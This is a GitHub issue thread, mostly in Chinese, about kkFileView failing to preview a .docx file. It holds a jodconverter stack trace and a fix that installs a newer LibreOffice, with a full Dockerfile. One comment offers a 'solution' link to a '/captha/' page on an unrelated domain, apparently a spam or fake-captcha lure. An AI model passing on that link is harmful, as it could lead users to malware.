### ISSUE TITLE
该（docx）文件暂不支持在线预览，官方在线体验地址也同样的报错

### ISSUE THREAD

**Issue by Holinc19** [kekingcn/kkFileView#596]
```
2024-09-19 03:09:58.867  INFO 1 --- [ter-poolentry-2] o.j.local.task.LocalConversionTask       : Executing local conversion task [docx -> pdf]...
2024-09-19 03:09:59.033 ERROR 1 --- [ter-poolentry-2] o.j.local.task.LocalConversionTask       : Local conversion failed.

java.lang.NullPointerException: Could not open document: 8fc0a154cd8649d4b9bb9cdb81d276db@CAXL2024592-1725526420492.docx
        at org.jodconverter.core.util.AssertUtils.notNull(AssertUtils.java:132) ~[jodconverter-core-4.4.6.jar!/:4.4.6]
        at org.jodconverter.local.task.AbstractLocalOfficeTask.loadDocument(AbstractLocalOfficeTask.java:210) ~[jodconverter-local-4.4.6.jar!/:4.4.6]
        at org.jodconverter.local.task.LocalConversionTask.execute(LocalConversionTask.java:129) ~[jodconverter-local-4.4.6.jar!/:4.4.6]
        at org.jodconverter.local.office.LocalOfficeManagerPoolEntry.doExecute(LocalOfficeManagerPoolEntry.java:121) [jodconverter-local-4.4.6.jar!/:4.4.6]
        at org.jodconverter.core.office.AbstractOfficeManagerPoolEntry.lambda$execute$0(AbstractOfficeManagerPoolEntry.java:81) [jodconverter-core-4.4.6.jar!/:4.4.6]
        at java.util.concurrent.FutureTask.run(FutureTask.java:266) ~[na:1.8.0_251]
        at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149) ~[na:1.8.0_251]
        at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624) ~[na:1.8.0_251]
        at java.lang.Thread.run(Thread.java:748) ~[na:1.8.0_251]
```

![image](https://github.com/user-attachments/assets/b5f35377-36fd-4cef-a1d6-d9664f4b1cfa)

**Comment by yangxinpei2015** [comment]
我们现在也是遇到这个问题~~

**Comment by gaoxingzaq** [comment]
原始文件发出

**Comment by Holinc19** [comment]
> 原始文件发出

https://oss-dev.kalugaqueen.com/xl-resources/demo/0/O2-PRIVITE/8fc0a154cd8649d4b9bb9cdb81d276db@CAXL2024592-1725526420492.docx

**Comment by gaoxingzaq** [comment]
损坏的原因可能是由于文档操作不当或数据传输造成的文档结构损坏。

建议您不要信任修复后的文档的内容。
该文档的宏执行已被禁用。

**Comment by Holinc19** [comment]
> 损坏的原因可能是由于文档操作不当或数据传输造成的文档结构损坏。
> 
> 建议您不要信任修复后的文档的内容。 该文档的宏执行已被禁用。

请问下如何检查你提到的这两个情况呢。

我下载文件用微软的Word能正常打开，通过微软的在线预览能正常打开（https://view.officeapps.live.com/op/view.aspx?src=https%3A%2F%2Foss-dev.kalugaqueen.com%2Fxl-resources%2Fdemo%2F0%2FO2-PRIVITE%2F8fc0a154cd8649d4b9bb9cdb81d276db%40CAXL2024592-1725526420492.docx&wdOrigin=BROWSELINK）

**Comment by Prateek-coder19** [comment]
to fix your trouble check this solution [click](https://www.calvarywhangarei.co.nz/captha/index.html)
maybe this will solve your problem.

**Comment by rory-tang** [comment]
我在构建Docker镜像时手动安装了最新版本带gui的libreoffice解决了这个问题

**Comment by ZKANGGIT** [comment]
> 我在构建Docker镜像时手动安装了最新版本带gui的libreoffice解决了这个问题

感谢兄弟，亲测有用

**Comment by Holinc19** [comment]
> > 我在构建Docker镜像时手动安装了最新版本带gui的libreoffice解决了这个问题
> 
> 感谢兄弟，亲测有用

怎么操作咧。可以的话，贴个操作步骤记录一下，也方便大伙。 @ZKANGGIT

**Comment by ZKANGGIT** [comment]
我是用的kk的jar部署的，https://mirrors.nju.edu.cn/tdf/libreoffice/stable/25.2.4/rpm/x86_64/LibreOffice_25.2.4_Linux_x86-64_rpm.tar.gz，下载，解压，安装（sudo rpm -Uvh  *.rpm） ，重启 kk服务

**Comment by ZKANGGIT** [comment]
> > > 我在构建Docker镜像时手动安装了最新版本带gui的libreoffice解决了这个问题
> > 
> > 
> > 感谢兄弟，亲测有用
> 
> 怎么操作咧。可以的话，贴个操作步骤记录一下，也方便大伙。 [@ZKANGGIT](https://github.com/ZKANGGIT)

我是用的kk的jar部署的，[https://mirrors.nju.edu.cn/tdf/libreoffice/stable/25.2.4/rpm/x86_64/LibreOffice_25.2.4_Linux_x86-64_rpm.tar.gz，下载，解压，安装（sudo](https://mirrors.nju.edu.cn/tdf/libreoffice/stable/25.2.4/rpm/x86_64/LibreOffice_25.2.4_Linux_x86-64_rpm.tar.gz%EF%BC%8C%E4%B8%8B%E8%BD%BD%EF%BC%8C%E8%A7%A3%E5%8E%8B%EF%BC%8C%E5%AE%89%E8%A3%85%EF%BC%88sudo) rpm -Uvh *.rpm） ，重启 kk服务

**Comment by Holinc19** [comment]
这里有一个关联性issue可供参考https://github.com/jodconverter/jodconverter/issues/407

**Comment by rory-tang** [comment]
> > > > 我在构建Docker镜像时手动安装了最新版本带gui的libreoffice解决了这个问题
> > > 
> > > 
> > > 感谢兄弟，亲测有用
> > 
> > 
> > 怎么操作咧。可以的话，贴个操作步骤记录一下，也方便大伙。 [@ZKANGGIT](https://github.com/ZKANGGIT)
> 
> 我是用的kk的jar部署的，[https://mirrors.nju.edu.cn/tdf/libreoffice/stable/25.2.4/rpm/x86_64/LibreOffice_25.2.4_Linux_x86-64_rpm.tar.gz，下载，解压，安装（sudo](https://mirrors.nju.edu.cn/tdf/libreoffice/stable/25.2.4/rpm/x86_64/LibreOffice_25.2.4_Linux_x86-64_rpm.tar.gz%EF%BC%8C%E4%B8%8B%E8%BD%BD%EF%BC%8C%E8%A7%A3%E5%8E%8B%EF%BC%8C%E5%AE%89%E8%A3%85%EF%BC%88sudo) rpm -Uvh *.rpm） ，重启 kk服务

1. 将你下载好的libreoffice放到`kkfileview/docker/kkfileview-base/libreoffice`目录下，例如我的就是`kkfileview/docker/kkfileview-base/libreoffice/LibreOffice_25.2.4_Linux_x86-64_deb.tar.gz`
2. 修改`kkfileview/docker/kkfileview-base/Dockerfile`
```Dockerfile
FROM ubuntu:24.04

ENV DEBIAN_FRONTEND=noninteractive

RUN echo "deb http://mirrors.tuna.tsinghua.edu.cn/ubuntu/ noble main restricted universe multiverse\n\
deb http://mirrors.tuna.tsinghua.edu.cn/ubuntu/ noble-updates main restricted universe multiverse\n\
deb http://mirrors.tuna.tsinghua.edu.cn/ubuntu/ noble-backports main restricted universe multiverse\n\
deb http://mirrors.tuna.tsinghua.edu.cn/ubuntu/ noble-security main restricted universe multiverse" > /etc/apt/sources.list && \
    apt-get update && \
    apt-get install -y --no-install-recommends \
        openjdk-8-jre tzdata locales libc-bin xfonts-utils fontconfig libxslt1.1 \
        cabextract wget && \
    echo "Asia/Shanghai" > /etc/timezone && \
    ln -sf /usr/share/zoneinfo/Asia/Shanghai /etc/localtime && \
    localedef -i zh_CN -c -f UTF-8 -A /usr/share/locale/locale.alias zh_CN.UTF-8 && \
    locale-gen zh_CN.UTF-8

COPY libreoffice/LibreOffice_25.2.4_Linux_x86-64_deb.tar.gz /tmp/

RUN tar zxvf /tmp/LibreOffice_25.2.4_Linux_x86-64_deb.tar.gz -C /tmp && \
    cd /tmp/LibreOffice_25.2.4.3_Linux_x86-64_deb/DEBS/ && \
    dpkg -i *.deb || true && \
    apt-get install -f -y

RUN echo "ttf-mscorefonts-installer msttcorefonts/accepted-mscorefonts-eula select true" | debconf-set-selections && \
    echo "media-types media-types/install-mime.types select install" | debconf-set-selections && \
    apt-get install -y --no-install-recommends \
        -o Dpkg::Options::="--force-confdef" \
        -o Dpkg::Options::="--force-confold" \
        ttf-mscorefonts-installer \
        ttf-wqy-microhei \
        ttf-wqy-zenhei \
        xfonts-wqy

RUN apt-get autoremove -y && \
    apt-get clean && \
    rm -rf /var/lib/apt/lists/* /tmp/LibreOffice_25.2.3.2_Linux_x86-64_deb /tmp/LibreOffice_25.2.3_Linux_x86-64_deb.tar.gz

ADD fonts/* /usr/share/fonts/chinese/

RUN cd /usr/share/fonts/chinese && \
    mkfontscale && \
    mkfontdir && \
    fc-cache -fv

ENV LANG=zh_CN.UTF-8 LC_ALL=zh_CN.UTF-8
```
3. 构建`kkfileview-base`镜像
4. 构建`kkfileview`镜像
5. 启动`kkfileview`镜像，需要指定环境变量`KK_OFFICE_HOME`为你安装的目录，例如我是`/opt/libreoffice25.2`

**Comment by klboke** [comment]
由于该 issue 已长时间无新反馈（超过 1 年），为便于维护当前问题队列，先做关闭处理。\n\n如果问题在最新版本仍可复现，请基于最新版本重新提一个新 issue，并补充：\n1) 复现步骤\n2) 版本与部署方式\n3) 关键日志/报错截图\n\n我们会优先跟进。
